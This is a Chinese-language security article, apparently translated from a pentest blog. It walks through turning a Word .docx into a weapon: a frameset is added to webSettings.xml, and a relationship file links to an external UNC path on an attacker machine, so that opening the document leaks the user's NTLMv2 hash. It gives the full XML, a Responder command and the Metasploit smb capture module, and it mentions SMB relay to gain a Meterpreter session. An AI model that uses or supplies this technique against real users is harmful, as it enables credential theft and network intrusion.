利用Office文件的Frameset 远程获取 NTLM 哈希-华盟网

利用Office文件的Frameset 远程获取 NTLM 哈希

华盟学院山东省第二期线下学习计划

微软Office文档文件对于红队评估起着至关重要的作用,因为他们通常习惯于在客户的内部网络上获得一些初步的立足点。保持在雷达之下也是一个关键的因素,这只能通过滥用合法的Windows功能或可靠的应用程序(如Microsoft Office)来实现。

在历史上,Microsoft Word被用作HTML编辑器。这意味着它可以支持HTML元素,如框架集。因此,可以将Microsoft Word文档与UNC路径相链接,并将其与Responder结合,就能从外部捕获NTLM哈希值。0

带有docx扩展名的Word文档实际上是一个包含各种XML文档的zip文件。这些XML文件主要用于控制主题,字体,文档的设置和Web设置。使用7-zip 可以打开该压缩包看看这些文件:

利用Office文件的Frameset 远程获取 NTLM 哈希

Docx 文件内容

word文件夹中包含一个名为webSettings.xml的文件。这个文件需要修改才能包含框架集。

利用Office文件的Frameset 远程获取 NTLM 哈希

webSettings文件

添加下面的代码将创建与另一个文件的链接。

<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
<w:color w:val="auto"/>
<w:noBorder/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="3"/>
<w:sourceFileName r:id="rId1"/>
<w:linkedToFile/>
</w:frame>
</w:frameset>
</w:frameset>

利用Office文件的Frameset 远程获取 NTLM 哈希

webSettings XML – 框架集

包含框架集的新的webSettings.xml文件需要重新添加到存档中,覆盖以前的版本。

利用Office文件的Frameset 远程获取 NTLM 哈希

带有Frameset的webSettings – 添加新版本到压缩包

必须创建一个新文件(webSettings.xml.rels),并包含关系ID (rId1),UNC路径和TargetMode(是否是外部或内部的)。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
 Target="192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>

利用Office文件的Frameset 远程获取 NTLM 哈希

web设置XML关系文件 的内容

_rels文件夹包含了文档的字体,风格,主题,设置等。将新的文件放置在该目录将最终确定和之前已经通过框架集创建的文件之间的关系链接。

利用Office文件的Frameset 远程获取 NTLM 哈希

webSettings XML rels 文件夹

现在,Word文档已被武装化并在打开时连接到网络上的UNC路径,Responder可以被配置为捕获NTLM哈希值。

responder -I wlan0 -e 192.168.1.169 -b -A -v

利用Office文件的Frameset 远程获取 NTLM 哈希

Responder配置

一旦目标用户打开Word文档,它将尝试连接到UNC路径。

利用Office文件的Frameset 远程获取 NTLM 哈希

打开Word文档会通过框架集连接到UNC路径

Responder将检索用户的NTLMv2哈希值。

利用Office文件的Frameset 远程获取 NTLM 哈希

Responder 可以获取到通过框架集的NTLMv2哈希

或者可以使用Metasploit Framework来代替Responder来捕获密码哈希值。

auxiliary/server/capture/smb

利用Office文件的Frameset 远程获取 NTLM 哈希

Metasploit – SMB捕获模块

打开文档后,Metasploit将捕获NTLMv2哈希值。

利用Office文件的Frameset 远程获取 NTLM 哈希

Metasploit SMB捕获模块 – 通过框架集的NTLMv2哈希

结论

www.idc126.com

如果VPN访问的双因素身份验证未启用且密码策略较弱,则该技术可以允许红队从用户那里获取可用于内部网络访问的域密码哈希值。此外,如果目标用户是本地管理员或域管理员等高权限帐户,则可以将此方法与SMB中继组合利用,就可以获得Meterpreter会话。

本文翻译自:https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ ,如若转载,请注明原文地址: http://www.4hou.com/technology/9403.html
本文由 华盟网 作者:AlexFrankly 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论